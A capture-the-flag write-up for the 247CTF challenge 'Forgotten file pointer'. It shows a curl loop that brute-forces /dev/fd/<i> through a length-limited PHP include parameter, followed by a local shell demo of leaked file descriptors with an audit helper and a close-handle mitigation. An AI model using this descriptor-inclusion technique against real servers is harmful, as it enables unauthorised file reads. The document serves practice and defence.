247CTF solution: Forgotten file pointer

We know that the flag is in /tmp/flag.txt, and that to read a file we have to send the server a GET parameter named include.

PHP has a bug titled "Cannot open file descriptor streams", so we will brute-force the file descriptor number to find the flag.

https://17ab3b9759789fcb.247ctf.com/?include=/dev/fd/<i>

With 0 <= i <= 99, because the length of include must be less than or equal to 10: /dev/fd/ takes 8 characters, which leaves at most two digits for i.

We use:

for i in $(seq 0 99); do echo; echo "Testing fd $i"; curl -s "https://17ab3b9759789fcb.247ctf.com/?include=/dev/fd/$i" | grep 247; done

The flag is printed when i = 10.
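
Why the short /dev/fd/<i> path works at all, and how to check for it on your own host: the following is an added example, not code from the challenge. It assumes Linux (where /dev/fd points at /proc/self/fd); the temp file, fd 9 and both function names are made up for the demo. It shows that a file handle left open stays readable through its descriptor number, how to list such handles for a process, and that closing the handle removes the alias.

```shell
#!/bin/sh
# Added example: constructed local demo, no network access.
# Assumes Linux, where /dev/fd is a symlink to /proc/self/fd.

# list_fds_matching PID NEEDLE (hypothetical helper)
# Print the descriptor numbers of process PID whose target path contains NEEDLE.
list_fds_matching() {
    pid=$1; needle=$2
    for entry in /proc/"$pid"/fd/*; do
        target=$(readlink "$entry" 2>/dev/null) || continue
        case $target in
            *"$needle"*) echo "${entry##*/}" ;;
        esac
    done
}

# read_via_fd N (hypothetical helper)
# Read a file through its descriptor alias instead of its real path.
read_via_fd() {
    cat "/dev/fd/$1" 2>/dev/null
}

# Constructed stand-in for a sensitive file the application opened.
secret=$(mktemp)
echo "constructed-secret" > "$secret"
needle=${secret##*/}

exec 9< "$secret"                              # handle opened and never closed
leaked=$(list_fds_matching $$ "$needle")       # audit of this shell finds fd 9
via_fd=$(read_via_fd 9)                        # short alias returns the content

exec 9<&-                                      # mitigation: close the handle
after_close=$(list_fds_matching $$ "$needle")  # nothing left to find
via_fd_after=$(read_via_fd 9) || via_fd_after=""

rm -f "$secret"
printf 'leaked fd: %s\nread via /dev/fd/9: %s\nafter close: "%s" "%s"\n' \
    "$leaked" "$via_fd" "$after_close" "$via_fd_after"
```

On a real server, point list_fds_matching at the PID of the PHP worker and a path fragment you care about; any hit is a handle that a length-limited include can still reach.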
